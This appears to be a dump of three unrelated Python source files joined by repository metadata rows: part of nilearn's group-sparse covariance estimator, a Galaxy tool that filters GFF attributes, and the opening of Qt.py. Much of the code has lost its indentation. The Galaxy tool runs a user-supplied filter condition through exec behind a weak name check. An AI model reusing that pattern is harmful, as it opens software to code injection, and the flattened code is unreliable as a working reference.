y[:, :p] = omega[:p, p, :].T
y[:, p:] = omega[p + 1:, p, :].T
u[:, :p] = emp_covs[:p, p, :].T
u[:, p:] = emp_covs[p + 1:, p, :].T
for m in xrange(n_features - 1):
# Coordinate descent on y
# T(k) -> n_samples[k]
# v(k) -> emp_covs[p, p, k]
# h_22(k) -> W_inv[m, m, k]
# h_12(k) -> W_inv[:m, m, k], W_inv[m+1:, m, k]
# y_1(k) -> y[k, :m], y[k, m+1:]
# u_2(k) -> u[k, m]
h_12[:, :m] = W_inv[:m, m, :].T
h_12[:, m:] = W_inv[m + 1:, m, :].T
y_1[:, :m] = y[:, :m]
y_1[:, m:] = y[:, m + 1:]
c[:] = - n_samples * (
emp_covs[p, p, :] * (h_12 * y_1).sum(axis=1) + u[:, m]
)
c2 = np.sqrt(np.dot(c, c))
# x -> y[:][m]
if c2 <= alpha:
y[:, m] = 0 # x* = 0
else:
# q(k) -> T(k) * v(k) * h_22(k)
# \lambda -> gamma (lambda is a Python keyword)
q[:] = n_samples * emp_covs[p, p, :] * W_inv[m, m, :]
if debug:
assert(np.all(q > 0))
# x* = \lambda* diag(1 + \lambda q)^{-1} c
# Newton-Raphson loop. Loosely based on Scipy's.
# Tolerance does not seem to be important for numerical
# stability (tolerance of 1e-2 works) but has an effect on
# overall convergence rate (the tighter the better.)
gamma = 0. # initial value
# Precompute some quantities
cc = c * c
two_ccq = 2. * cc * q
for _ in itertools.repeat(None, 100):
# Function whose zero must be determined (fval) and
# its derivative (fder).
# Written inplace to save some function calls.
aq = 1. + gamma * q
aq2 = aq * aq
fder = (two_ccq / (aq2 * aq)).sum()
if fder == 0:
msg = "derivative was zero."
warnings.warn(msg, RuntimeWarning)
break
fval = - (alpha2 - (cc / aq2).sum()) / fder
gamma = fval + gamma
if abs(fval) < 1.5e-8:
break
if abs(fval) > 0.1:
warnings.warn("Newton-Raphson step did not converge.\n"
"This may indicate a badly conditioned "
"system.")
if debug:
assert gamma >= 0., gamma
y[:, m] = (gamma * c) / aq # x*
# Copy back y in omega (column and row)
omega[:p, p, :] = y[:, :p].T
omega[p + 1:, p, :] = y[:, p:].T
omega[p, :p, :] = y[:, :p].T
omega[p, p + 1:, :] = y[:, p:].T
for k in xrange(n_subjects):
omega[p, p, k] = 1. / emp_covs[p, p, k] + np.dot(
np.dot(y[k, :], W_inv[..., k]), y[k, :])
if debug:
assert(is_spd(omega[..., k]))
if probe_function is not None:
if probe_function(emp_covs, n_samples, alpha, max_iter, tol,
n, omega, omega_old) is True:
probe_interrupted = True
logger.log("probe_function interrupted loop", verbose=verbose,
msg_level=2)
break
# Compute max of variation
omega_old -= omega
omega_old = abs(omega_old)
max_norm = omega_old.max()
if tol is not None and max_norm < tol:
logger.log("tolerance reached at iteration number {0:d}: {1:.3e}"
"".format(n + 1, max_norm), verbose=verbose)
tolerance_reached = True
break
if tol is not None and not tolerance_reached and not probe_interrupted:
warnings.warn("Maximum number of iterations reached without getting "
"to the requested tolerance level.")
return omega
class GroupSparseCovariance(BaseEstimator, CacheMixin):
"""Covariance and precision matrix estimator.
Parameters
----------
alpha : float
        regularization parameter. With normalized covariance matrices and
        numbers of samples, sensible values lie in the [0, 1] range (zero
        means no regularization: the output is not sparse).
tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped
max_iter : int, optional
maximum number of iterations. The default value (10) is rather
conservative.
verbose : int, optional
verbosity level. Zero means "no message".
memory : instance of joblib.Memory or string, optional
Used to cache the masking process.
By default, no caching is done. If a string is given, it is the
path to the caching directory.
memory_level : int, optional
Caching aggressiveness. Higher values mean more caching.
Attributes
----------
`covariances_` : numpy.ndarray, shape (n_features, n_features, n_subjects)
empirical covariance matrices.
    `precisions_` : numpy.ndarray, shape (n_features, n_features, n_subjects)
precisions matrices estimated using the group-sparse algorithm.
Notes
------
The model used has been introduced in:
Gael Varoquaux, et al. `Brain Covariance Selection: Better Individual
Functional Connectivity Models Using Population Prior
<http://arxiv.org/abs/1008.5071>`_'.
The algorithm used is based on what is described in:
Jean Honorio and Dimitris Samaras.
"Simultaneous and Group-Sparse Multi-Task Learning of Gaussian Graphical
Models". http://arxiv.org/abs/1207.4255.
"""
def __init__(self, alpha=0.1, tol=1e-3, max_iter=10, verbose=1,
memory=Memory(cachedir=None), memory_level=0):
self.alpha = alpha
self.tol = tol
self.max_iter = max_iter
self.memory = memory
self.memory_level = memory_level
self.verbose = verbose
def fit(self, subjects, y=None):
"""Fits the group sparse precision model according to the given
training data and parameters.
Parameters
----------
subjects : list of numpy.ndarray with shapes (n_samples, n_features)
input subjects. Each subject is a 2D array, whose columns contain
signals. Sample number can vary from subject to subject, but all
subjects must have the same number of features (i.e. of columns).
Attributes
----------
`covariances_` : numpy.ndarray
empirical covariances
`precisions_` : numpy.ndarray
precision matrices
Returns
-------
self : GroupSparseCovariance instance
the object itself. Useful for chaining operations.
"""
logger.log("Computing covariance matrices", verbose=self.verbose)
self.covariances_, n_samples = empirical_covariances(
subjects, assume_centered=False)
logger.log("Computing precision matrices", verbose=self.verbose)
ret = self._cache(
_group_sparse_covariance, memory_level=1)(
self.covariances_, n_samples, self.alpha,
tol=self.tol, max_iter=self.max_iter,
verbose=self.verbose - 1, debug=False)
self.precisions_ = ret
return self
def empirical_covariances(subjects, assume_centered=False, standardize=False):
"""Compute empirical covariances for several signals.
Parameters
----------
subjects : list of numpy.ndarray, shape for each (n_samples, n_features)
input subjects. Each subject is a 2D array, whose columns contain
signals. Sample number can vary from subject to subject, but all
subjects must have the same number of features (i.e. of columns).
assume_centered : bool, optional
if True, assume that all input signals are centered. This slightly
decreases computation time by avoiding useless computation.
standardize : bool, optional
if True, set every signal variance to one before computing their
covariance matrix (i.e. compute a correlation matrix).
Returns
-------
    emp_covs : numpy.ndarray, shape (n_features, n_features, n_subjects)
        empirical covariances.
    n_samples : numpy.ndarray, shape (n_subjects,)
        number of samples for each subject. dtype is np.float.
"""
if not hasattr(subjects, "__iter__"):
raise ValueError("'subjects' input argument must be an iterable. "
"You provided {0}".format(subjects.__class__))
    n_features_list = [s.shape[1] for s in subjects]
    if len(set(n_features_list)) > 1:
        raise ValueError("All subjects must have the same number of "
                         "features.\nYou provided: {0}"
                         "".format(str(n_features_list)))
n_subjects = len(subjects)
n_features = subjects[0].shape[1]
    # The dtype is left to numpy's default here: depending on the input,
    # conversion from single precision to double may or may not be required.
emp_covs = np.empty((n_features, n_features, n_subjects), order="F")
for k, s in enumerate(subjects):
if standardize:
s = s / s.std(axis=0) # copy on purpose
M = empirical_covariance(s, assume_centered=assume_centered)
# Force matrix symmetry, for numerical stability
# of _group_sparse_covariance
emp_covs[..., k] = M + M.T
emp_covs /= 2
n_samples = np.asarray([s.shape[0] for s in subjects], dtype=np.float)
return emp_covs, n_samples
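# A hedged sketch (not part of the original module) contrasting covariance
# and correlation outputs; the input signals are invented.
def _example_empirical_covariances():
    rand_gen = np.random.RandomState(1)
    subjects = [rand_gen.randn(20, 3), rand_gen.randn(25, 3)]
    # standardize=True rescales every signal to unit variance first, so the
    # returned stack contains correlation matrices.
    emp_covs, n_samples = empirical_covariances(subjects, standardize=True)
    print("%s %s" % (emp_covs.shape, n_samples))  # (3, 3, 2) [ 20.  25.]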
def group_sparse_scores(precisions, n_samples, emp_covs, alpha,
duality_gap=False, debug=False):
"""Compute scores used by group_sparse_covariance.
The log-likelihood of a given list of empirical covariances /
precisions.
Parameters
----------
precisions : numpy.ndarray, shape (n_features, n_features, n_subjects)
estimated precisions.
n_samples : array-like, shape (n_subjects,)
number of samples used in estimating each subject in "precisions".
n_samples.sum() must be equal to 1.
emp_covs : numpy.ndarray, shape (n_features, n_features, n_subjects)
empirical covariance matrix
alpha : float
regularization parameter
duality_gap : bool, optional
if True, also returns a duality gap upper bound.
debug : bool, optional
if True, some consistency checks are performed to help solving
numerical problems
Returns
-------
log_lik : float
log-likelihood of precisions on the given covariances. This is the
opposite of the loss function, without the regularization term
objective : float
value of objective function. This is the value minimized by
group_sparse_covariance()
duality_gap : float
duality gap upper bound. The returned bound is tight: it vanishes for
the optimal precision matrices
"""
n_features, _, n_subjects = emp_covs.shape
log_lik = 0
for k in range(n_subjects):
log_lik_k = - np.sum(emp_covs[..., k] * precisions[..., k])
log_lik_k += fast_logdet(precisions[..., k])
log_lik += n_samples[k] * log_lik_k
l2 = np.sqrt((precisions ** 2).sum(axis=-1))
l12 = l2.sum() - np.diag(l2).sum() # Do not count diagonal terms
objective = alpha * l12 - log_lik
ret = (log_lik, objective)
# Compute duality gap if requested
if duality_gap is True:
A = np.empty(precisions.shape, dtype=np.float, order="F")
for k in range(n_subjects):
# TODO: can be computed more efficiently using W_inv. See
# Friedman, Jerome, Trevor Hastie, and Robert Tibshirani.
# 'Sparse Inverse Covariance Estimation with the Graphical Lasso'.
# Biostatistics 9, no. 3 (1 July 2008): 432-441.
precisions_inv = scipy.linalg.inv(precisions[..., k])
if debug:
assert is_spd(precisions_inv)
A[..., k] = n_samples[k] * (precisions_inv - emp_covs[..., k])
if debug:
np.testing.assert_almost_equal(A[..., k], A[..., k].T)
# Project A on the set of feasible points
alpha_max = np.sqrt((A ** 2).sum(axis=-1))
mask = alpha_max > alpha
for k in range(A.shape[-1]):
A[mask, k] *= alpha / alpha_max[mask]
# Set zeros on diagonals. Essential to get an always positive
# duality gap.
A[..., k].flat[::A.shape[0] + 1] = 0
alpha_max = np.sqrt((A ** 2).sum(axis=-1)).max()
dual_obj = 0 # dual objective
for k in range(n_subjects):
B = emp_covs[..., k] + A[..., k] / n_samples[k]
dual_obj += n_samples[k] * (n_features + fast_logdet(B))
# The previous computation can lead to a non-feasible point, because
# one of the Bs may not be positive definite.
        # Use another value in this case, one that ensures positive
        # definiteness of B. The upper bound on the duality gap is not tight
        # in the following, but is smaller than infinity, which is better
        # in any case.
if not np.isfinite(dual_obj):
for k in range(n_subjects):
A[..., k] = - n_samples[k] * emp_covs[..., k]
A[..., k].flat[::A.shape[0] + 1] = 0
alpha_max = np.sqrt((A ** 2).sum(axis=-1)).max()
            # the second value (0.05) is arbitrary: any value in (0, 1) works
gamma = min((alpha / alpha_max, 0.05))
dual_obj = 0
for k in range(n_subjects):
# add gamma on the diagonal
B = ((1. - gamma) * emp_covs[..., k]
+ gamma * np.eye(emp_covs.shape[0]))
dual_obj += n_samples[k] * (n_features + fast_logdet(B))
gap = objective - dual_obj
ret = ret + (gap,)
return ret
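# A hedged sketch (not part of the original module): scores identity
# precision matrices against invented covariances. n_samples is normalized
# to sum to one, as the docstring above requires.
def _example_group_sparse_scores():
    rand_gen = np.random.RandomState(2)
    subjects = [rand_gen.randn(30, 4), rand_gen.randn(30, 4)]
    emp_covs, n_samples = empirical_covariances(subjects)
    n_samples /= n_samples.sum()
    # Stack two 4x4 identity matrices along the last axis.
    precisions = np.repeat(np.eye(4)[..., np.newaxis], 2, axis=2)
    log_lik, objective = group_sparse_scores(
        precisions, n_samples, emp_covs, alpha=0.1)
    print("log-likelihood %.3f, objective %.3f" % (log_lik, objective))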
def group_sparse_covariance_path(train_subjs, alphas, test_subjs=None,
tol=1e-3, max_iter=10, precisions_init=None,
verbose=0, debug=False, probe_function=None):
"""Get estimated precision matrices for different values of alpha.
Calling this function is faster than calling group_sparse_covariance()
repeatedly, because it makes use of the first result to initialize the
next computation.
Parameters
----------
train_subjs : list of numpy.ndarray
list of signals.
alphas : list of float
values of alpha to use. Best results for sorted values (decreasing)
test_subjs : list of numpy.ndarray
list of signals, independent from those in train_subjs, on which to
compute a score. If None, no score is computed.
verbose : int
verbosity level
tol, max_iter, debug, precisions_init :
Passed to group_sparse_covariance(). See the corresponding docstring
for details.
probe_function : callable
This value is called before the first iteration and after each
iteration. If it returns True, then optimization is stopped
prematurely.
The function is given as arguments (in that order):
- empirical covariances (ndarray),
- number of samples for each subject (ndarray),
- regularization parameter (float)
- maximum iteration number (integer)
- tolerance (float)
- current iteration number (integer). -1 means "before first iteration"
- current value of precisions (ndarray).
- previous value of precisions (ndarray). None before first iteration.
Returns
-------
precisions_list : list of numpy.ndarray
estimated precisions for each value of alpha provided. The length of
this list is the same as that of parameter "alphas".
scores : list of float
for each estimated precision, score obtained on the test set. Output
only if test_subjs is not None.
"""
train_covs, train_n_samples = empirical_covariances(
train_subjs, assume_centered=False, standardize=True)
scores = []
precisions_list = []
for alpha in alphas:
precisions = _group_sparse_covariance(
train_covs, train_n_samples, alpha, tol=tol, max_iter=max_iter,
precisions_init=precisions_init, verbose=verbose, debug=debug,
probe_function=probe_function)
# Compute log-likelihood
if test_subjs is not None:
test_covs, _ = empirical_covariances(
test_subjs, assume_centered=False, standardize=True)
scores.append(group_sparse_scores(precisions, train_n_samples,
test_covs, 0)[0])
precisions_list.append(precisions)
precisions_init = precisions
if test_subjs is not None:
return precisions_list, scores
else:
return precisions_list
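# A hedged sketch (not part of the original module): a warm-started path over
# decreasing alpha values, scored on invented held-out subjects. The small
# max_iter keeps the run cheap and may trigger convergence warnings.
def _example_group_sparse_covariance_path():
    rand_gen = np.random.RandomState(3)
    train = [rand_gen.randn(40, 5), rand_gen.randn(40, 5)]
    test = [rand_gen.randn(20, 5), rand_gen.randn(20, 5)]
    precisions_list, scores = group_sparse_covariance_path(
        train, alphas=[0.5, 0.1, 0.02], test_subjs=test, max_iter=5)
    # One precision stack and one test log-likelihood per alpha value.
    print("%d precision stacks, scores: %s" % (len(precisions_list), scores))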
class EarlyStopProbe(object):
"""Callable probe for early stopping in GroupSparseCovarianceCV.
Stop optimizing as soon as the score on the test set starts decreasing.
An instance of this class is supposed to be passed in the probe_function
argument of group_sparse_covariance().
"""
def __init__(self, test_subjs, verbose=1):
self.test_emp_covs, _ = empirical_covariances(test_subjs)
self.verbose = verbose
def __call__(self, emp_covs, n_samples, alpha, max_iter, tol,
iter_n, omega, prev_omega):
log_lik, _ = group_sparse_scores(
omega, n_samples, self.test_emp_covs, alpha)
if iter_n > -1 and self.last_log_lik > log_lik:
logger.log("Log-likelihood on test set is decreasing. "
"Stopping at iteration %d"
% iter_n, verbose=self.verbose)
return True
self.last_log_lik = log_lik
class GroupSparseCovarianceCV(BaseEstimator, CacheMixin):
"""Sparse inverse covariance w/ cross-validated choice of the parameter.
A cross-validated value for the regularization parameter is first
determined using several calls to group_sparse_covariance. Then a final
optimization is run to get a value for the precision matrices, using the
selected value of the parameter. Different values of tolerance and of
    maximum iteration number can be used in these two phases (see, for
    example, the tol and tol_cv keywords below).
Parameters
----------
alphas : integer
initial number of points in the grid of regularization parameter
values. Each step of grid refinement adds that many points as well.
n_refinements : integer
number of times the initial grid should be refined.
cv : integer
number of folds in a K-fold cross-validation scheme. If None is passed,
defaults to 3.
tol_cv : float
tolerance used to get the optimal alpha value. It has the same meaning
as the `tol` parameter in :func:`group_sparse_covariance`.
max_iter_cv : integer
maximum number of iterations for each optimization, during the alpha-
selection phase.
tol : float
tolerance used during the final optimization for determining precision
matrices value.
max_iter : integer
maximum number of iterations in the final optimization.
verbose : integer
verbosity level. 0 means nothing is printed to the user.
n_jobs : integer
        maximum number of cpu cores to use. The number of cores actually used
        at the same time cannot exceed the number of folds in the folding
        strategy (that is, the value of cv).
debug : bool
if True, activates some internal checks for consistency. Only useful
for nilearn developers, not users.
early_stopping : bool
if True, reduce computation time by using a heuristic to reduce the
number of iterations required to get the optimal value for alpha. Be
aware that this can lead to slightly different values for the optimal
alpha compared to early_stopping=False.
Attributes
----------
`covariances_` : numpy.ndarray, shape (n_features, n_features, n_subjects)
covariance matrices, one per subject.
`precisions_` : numpy.ndarray, shape (n_features, n_features, n_subjects)
precision matrices, one per subject. All matrices have the same
sparsity pattern (if a coefficient is zero for a given matrix, it
is also zero for every other.)
`alpha_` : float
penalization parameter value selected.
`cv_alphas_` : list of floats
all values of the penalization parameter explored.
`cv_scores_` : numpy.ndarray, shape (n_alphas, n_folds)
scores obtained on test set for each value of the penalization
parameter explored.
See also
--------
group_sparse_covariance, GroupSparseCovariance,
sklearn.covariance.GraphLassoCV
Notes
-----
The search for the optimal penalization parameter (alpha) is done on an
iteratively refined grid: first the cross-validated scores on a grid are
computed, then a new refined grid is centered around the maximum, and so
on.
"""
def __init__(self, alphas=4, n_refinements=4, cv=None,
tol_cv=1e-2, max_iter_cv=50,
tol=1e-3, max_iter=100, verbose=1,
n_jobs=1, debug=False, early_stopping=True):
self.alphas = alphas
self.n_refinements = n_refinements
self.tol_cv = tol_cv
self.max_iter_cv = max_iter_cv
self.cv = cv
self.tol = tol
self.max_iter = max_iter
self.verbose = verbose
self.n_jobs = n_jobs
self.debug = debug
self.early_stopping = early_stopping
def fit(self, subjects, y=None):
"""Compute cross-validated group-sparse precisions.
Parameters
----------
subjects : list of numpy.ndarray with shapes (n_samples, n_features)
input subjects. Each subject is a 2D array, whose columns contain
signals. Sample number can vary from subject to subject, but all
subjects must have the same number of features (i.e. of columns.)
Attributes
----------
covariances_ : numpy.ndarray, shape (n_features, n_features, n_subjects)
covariance matrices, one per subject.
precisions_ : numpy.ndarray, shape (n_features, n_features, n_subjects)
precision matrices, one per subject. All matrices have the same
sparsity pattern (if a coefficient is zero for a given matrix, it
is also zero for every other.)
alpha_ : float
selected value for penalization parameter.
cv_alphas_ : list of float
all penalization parameter values explored.
cv_scores_ : numpy.ndarray with shape (n_alphas, n_folds)
scores obtained on test set for each value of the penalization
parameter explored.
Returns
=======
self: GroupSparseCovarianceCV
the object instance itself.
"""
# Empirical covariances
emp_covs, n_samples = \
empirical_covariances(subjects, assume_centered=False)
n_subjects = emp_covs.shape[2]
# One cv generator per subject must be created, because each subject
# can have a different number of samples from the others.
cv = []
for k in range(n_subjects):
cv.append(sklearn.cross_validation.check_cv(
self.cv, subjects[k], None, classifier=False))
path = list() # List of (alpha, scores, covs)
n_alphas = self.alphas
if isinstance(n_alphas, collections.Sequence):
alphas = list(self.alphas)
n_alphas = len(alphas)
n_refinements = 1
else:
n_refinements = self.n_refinements
alpha_1, _ = compute_alpha_max(emp_covs, n_samples)
alpha_0 = 1e-2 * alpha_1
alphas = np.logspace(np.log10(alpha_0), np.log10(alpha_1),
n_alphas)[::-1]
covs_init = itertools.repeat(None)
for i in range(n_refinements):
# Compute the cross-validated loss on the current grid
train_test_subjs = []
for train_test in zip(*cv):
assert(len(train_test) == n_subjects)
train_test_subjs.append(zip(*[(subject[train, :],
subject[test, :])
for subject, (train, test)
in zip(subjects, train_test)]))
if self.early_stopping:
probes = [EarlyStopProbe(test_subjs, verbose=self.verbose)
for _, test_subjs in train_test_subjs]
else:
probes = itertools.repeat(None)
this_path = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(group_sparse_covariance_path)(
train_subjs, alphas, test_subjs=test_subjs,
max_iter=self.max_iter_cv, tol=self.tol_cv,
verbose=self.verbose, debug=self.debug,
# Warm restart is useless with early stopping.
precisions_init=None if self.early_stopping else prec_init,
probe_function=probe)
for (train_subjs, test_subjs), prec_init, probe
in zip(train_test_subjs, covs_init, probes))
# this_path[i] is a tuple (precisions_list, scores)
# - scores: scores obtained with the i-th folding, for each value
# of alpha.
# - precisions_list: corresponding precisions matrices, for each
# value of alpha.
precisions_list, scores = zip(*this_path)
            # now scores[i][j] is the score for the i-th folding, j-th value
            # of alpha (analogous for precisions_list)
precisions_list = zip(*precisions_list)
scores = [np.mean(sc) for sc in zip(*scores)]
# scores[i] is the mean score obtained for the i-th value of alpha.
path.extend(zip(alphas, scores, precisions_list))
path = sorted(path, key=operator.itemgetter(0), reverse=True)
# Find the maximum score (avoid using the built-in 'max' function
# to have a fully-reproducible selection of the smallest alpha in
# case of equality)
best_score = -np.inf
last_finite_idx = 0
for index, (alpha, this_score, _) in enumerate(path):
if this_score >= .1 / np.finfo(np.float).eps:
this_score = np.nan
if np.isfinite(this_score):
last_finite_idx = index
if this_score >= best_score:
best_score = this_score
best_index = index
# Refine the grid
if best_index == 0:
# We do not need to go back: we have chosen
# the highest value of alpha for which there are
# non-zero coefficients
alpha_1 = path[0][0]
alpha_0 = path[1][0]
covs_init = path[0][2]
elif (best_index == last_finite_idx
and not best_index == len(path) - 1):
# We have non-converged models on the upper bound of the
# grid, we need to refine the grid there
alpha_1 = path[best_index][0]
alpha_0 = path[best_index + 1][0]
covs_init = path[best_index][2]
elif best_index == len(path) - 1:
alpha_1 = path[best_index][0]
alpha_0 = 0.01 * path[best_index][0]
covs_init = path[best_index][2]
else:
alpha_1 = path[best_index - 1][0]
alpha_0 = path[best_index + 1][0]
covs_init = path[best_index - 1][2]
alphas = np.logspace(np.log10(alpha_1), np.log10(alpha_0),
len(alphas) + 2)
alphas = alphas[1:-1]
if n_refinements > 1:
logger.log("[GroupSparseCovarianceCV] Done refinement "
"% 2i out of %i" % (i + 1, n_refinements),
verbose=self.verbose)
path = list(zip(*path))
cv_scores_ = list(path[1])
alphas = list(path[0])
self.cv_scores_ = np.array(cv_scores_)
self.alpha_ = alphas[best_index]
self.cv_alphas_ = alphas
# Finally, fit the model with the selected alpha
logger.log("Final optimization", verbose=self.verbose)
self.covariances_ = emp_covs
self.precisions_ = _group_sparse_covariance(
emp_covs, n_samples, self.alpha_, tol=self.tol,
max_iter=self.max_iter,
verbose=self.verbose, debug=self.debug)
return self
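# A hedged usage sketch (not part of the original module): deliberately tiny
# grid and iteration counts so the cross-validated search stays cheap; real
# analyses would keep the defaults. All values are invented.
def _example_group_sparse_covariance_cv():
    rand_gen = np.random.RandomState(4)
    subjects = [rand_gen.randn(50, 4) for _ in range(3)]
    gsc = GroupSparseCovarianceCV(alphas=2, n_refinements=1, cv=2,
                                  max_iter=5, max_iter_cv=5, verbose=0)
    gsc.fit(subjects)
    # precisions_ has one (4, 4) matrix per subject: shape (4, 4, 3).
    print("alpha_=%.4f, precisions shape %s"
          % (gsc.alpha_, gsc.precisions_.shape))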
|
ainafp/nilearn
|
nilearn/group_sparse_covariance.py
|
Python
|
bsd-3-clause
| 42,396
|
[
"Gaussian"
] |
d5f419ade8853c3d05adf2de4b3e38d98b87d3f8ff38408884d2938d1355e819
|
#!/usr/bin/env python
# This tool takes a gff file as input and creates filters on attributes based on certain properties.
# The tool will skip over invalid lines within the file, informing the user about the number of lines skipped.
# TODO: much of this code is copied from the Filter1 tool (filtering.py in tools/stats/). The commonalities should be
# abstracted and leveraged in each filtering tool.
from __future__ import division
import sys
from galaxy import eggs
from galaxy.util.json import dumps, loads
# Older py compatibility
try:
set()
except:
from sets import Set as set
assert sys.version_info[:2] >= ( 2, 4 )
#
# Helper functions.
#
def get_operands( filter_condition ):
# Note that the order of all_operators is important
items_to_strip = ['+', '-', '**', '*', '//', '/', '%', '<<', '>>', '&', '|', '^', '~', '<=', '<', '>=', '>', '==', '!=', '<>', ' and ', ' or ', ' not ', ' is ', ' is not ', ' in ', ' not in ']
for item in items_to_strip:
if filter_condition.find( item ) >= 0:
filter_condition = filter_condition.replace( item, ' ' )
operands = set( filter_condition.split( ' ' ) )
return operands
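# A hedged sketch of what get_operands returns (hypothetical condition):
#   get_operands( 'gene_id == "X" and score > 0.5' )
#   -> set( ['', 'gene_id', '"X"', 'score', '0.5'] )
# Operators are replaced by spaces before splitting, so the empty string can
# appear among the operands.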
def stop_err( msg ):
sys.stderr.write( msg )
sys.exit()
def check_for_executable( text, description='' ):
# Attempt to determine if the condition includes executable stuff and, if so, exit.
secured = dir()
operands = get_operands( text )
for operand in operands:
try:
check = int( operand )
except:
if operand in secured:
stop_err( "Illegal value '%s' in %s '%s'" % ( operand, description, text ) )
#
# Process inputs.
#
in_fname = sys.argv[1]
out_fname = sys.argv[2]
cond_text = sys.argv[3]
attribute_types = loads( sys.argv[4] )
# Convert types from str to type objects.
for name, a_type in attribute_types.items():
check_for_executable(a_type)
attribute_types[ name ] = eval( a_type )
# Unescape if input has been escaped
mapped_str = {
'__lt__': '<',
'__le__': '<=',
'__eq__': '==',
'__ne__': '!=',
'__gt__': '>',
'__ge__': '>=',
'__sq__': '\'',
'__dq__': '"',
}
for key, value in mapped_str.items():
cond_text = cond_text.replace( key, value )
# Attempt to determine if the condition includes executable stuff and, if so, exit.
check_for_executable( cond_text, 'condition')
# Prepare the attribute variable names and type-cast wrappers for every
# attribute listed in attribute_types.
attrs, type_casts = [], []
for name, attr_type in attribute_types.items():
attrs.append( name )
type_cast = "get_value('%(name)s', attribute_types['%(name)s'], attribute_values)" % ( {'name': name} )
type_casts.append( type_cast )
attr_str = ', '.join( attrs ) # 'c1, c2, c3, c4'
type_cast_str = ', '.join( type_casts ) # 'str(c1), int(c2), int(c3), str(c4)'
wrap = "%s = %s" % ( attr_str, type_cast_str )
# Stats
skipped_lines = 0
first_invalid_line = 0
invalid_line = None
lines_kept = 0
total_lines = 0
out = open( out_fname, 'wt' )
# Helper function to safely get and type cast a value in a dict.
def get_value(name, a_type, values_dict):
if name in values_dict:
return (a_type)(values_dict[ name ])
else:
return None
# Read and filter input file, skipping invalid lines
code = '''
for i, line in enumerate( file( in_fname ) ):
total_lines += 1
line = line.rstrip( '\\r\\n' )
if not line or line.startswith( '#' ):
skipped_lines += 1
if not invalid_line:
first_invalid_line = i + 1
invalid_line = line
continue
try:
# Place attribute values into variables with attribute
# name; type casting is done as well.
elems = line.split( '\t' )
attribute_values = {}
for name_value_pair in elems[8].split(";"):
pair = name_value_pair.strip().split(" ")
            if len(pair) < 2:
                continue  # skip blank or malformed attribute entries
name = pair[0].strip()
if name == '':
continue
# Need to strip double quote from value and typecast.
attribute_values[name] = pair[1].strip(" \\"")
%s
if %s:
lines_kept += 1
print >> out, line
except Exception, e:
print e
skipped_lines += 1
if not invalid_line:
first_invalid_line = i + 1
invalid_line = line
''' % ( wrap, cond_text )
valid_filter = True
try:
exec code
except Exception, e:
out.close()
if str( e ).startswith( 'invalid syntax' ):
valid_filter = False
stop_err( 'Filter condition "%s" likely invalid. See tool tips, syntax and examples.' % cond_text )
else:
stop_err( str( e ) )
if valid_filter:
out.close()
valid_lines = total_lines - skipped_lines
print 'Filtering with %s, ' % ( cond_text )
if valid_lines > 0:
print 'kept %4.2f%% of %d lines.' % ( 100.0*lines_kept/valid_lines, total_lines )
else:
print 'Possible invalid filter condition "%s" or non-existent column referenced. See tool tips, syntax and examples.' % cond_text
if skipped_lines > 0:
print 'Skipped %d invalid lines starting at line #%d: "%s"' % ( skipped_lines, first_invalid_line, invalid_line )
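# A hypothetical invocation sketch (file names invented for illustration):
#   python gff_filter_by_attribute.py input.gff output.gff \
#       'gene_id __eq__ __dq__GENE1__dq__' '{"gene_id": "str"}'
# The escaped condition is unescaped via mapped_str to: gene_id == "GENE1"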
|
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/tools/filters/gff/gff_filter_by_attribute.py
|
Python
|
gpl-3.0
| 5,303
|
[
"Galaxy"
] |
8a5543d35ca0fcf119d7c375aa535093e7eb93746efc607cfbf8b20a6d7112aa
|
"""Minimal Python 2 & 3 shim around all Qt bindings
DOCUMENTATION
Qt.py was born in the film and visual effects industry to address
the growing need for the development of software capable of running
with more than one flavour of the Qt bindings for Python - PySide,
PySide2, PyQt4 and PyQt5.
1. Build for one, run with all
2. Explicit is better than implicit
3. Support co-existence
Default resolution order:
- PySide2
- PyQt5
- PySide
- PyQt4
Usage:
>> import sys
>> from Qt import QtWidgets
>> app = QtWidgets.QApplication(sys.argv)
>> button = QtWidgets.QPushButton("Hello World")
>> button.show()
>> app.exec_()
All members of PySide2 are mapped from other bindings, should they exist.
If no equivalent member exist, it is excluded from Qt.py and inaccessible.
The idea is to highlight members that exist across all supported bindings,
and guarantee that code that runs on one binding runs on all others.
For more details, visit https://github.com/mottosso/Qt.py
LICENSE
See end of file for license (MIT, BSD) information.
"""
import os
import sys
import types
import shutil
import importlib
import json
__version__ = "1.3.5"
# Enable support for `from Qt import *`
__all__ = []
# Flags from environment variables
QT_VERBOSE = bool(os.getenv("QT_VERBOSE"))
QT_PREFERRED_BINDING_JSON = os.getenv("QT_PREFERRED_BINDING_JSON", "")
QT_PREFERRED_BINDING = os.getenv("QT_PREFERRED_BINDING", "")
QT_SIP_API_HINT = os.getenv("QT_SIP_API_HINT")
# Reference to Qt.py
Qt = sys.modules[__name__]
Qt.QtCompat = types.ModuleType("QtCompat")
try:
long
except NameError:
# Python 3 compatibility
long = int
"""Common members of all bindings
This is where each member of Qt.py is explicitly defined.
It is based on a "lowest common denominator" of all bindings;
including members found in each of the 4 bindings.
The "_common_members" dictionary is generated using the
build_membership.sh script.
"""
_common_members = {
"QtCore": [
"QAbstractAnimation",
"QAbstractEventDispatcher",
"QAbstractItemModel",
"QAbstractListModel",
"QAbstractState",
"QAbstractTableModel",
"QAbstractTransition",
"QAnimationGroup",
"QBasicTimer",
"QBitArray",
"QBuffer",
"QByteArray",
"QByteArrayMatcher",
"QChildEvent",
"QCoreApplication",
"QCryptographicHash",
"QDataStream",
"QDate",
"QDateTime",
"QDir",
"QDirIterator",
"QDynamicPropertyChangeEvent",
"QEasingCurve",
"QElapsedTimer",
"QEvent",
"QEventLoop",
"QEventTransition",
"QFile",
"QFileInfo",
"QFileSystemWatcher",
"QFinalState",
"QGenericArgument",
"QGenericReturnArgument",
"QHistoryState",
"QItemSelectionRange",
"QIODevice",
"QLibraryInfo",
"QLine",
"QLineF",
"QLocale",
"QMargins",
"QMetaClassInfo",
"QMetaEnum",
"QMetaMethod",
"QMetaObject",
"QMetaProperty",
"QMimeData",
"QModelIndex",
"QMutex",
"QMutexLocker",
"QObject",
"QParallelAnimationGroup",
"QPauseAnimation",
"QPersistentModelIndex",
"QPluginLoader",
"QPoint",
"QPointF",
"QProcess",
"QProcessEnvironment",
"QPropertyAnimation",
"QReadLocker",
"QReadWriteLock",
"QRect",
"QRectF",
"QRegExp",
"QResource",
"QRunnable",
"QSemaphore",
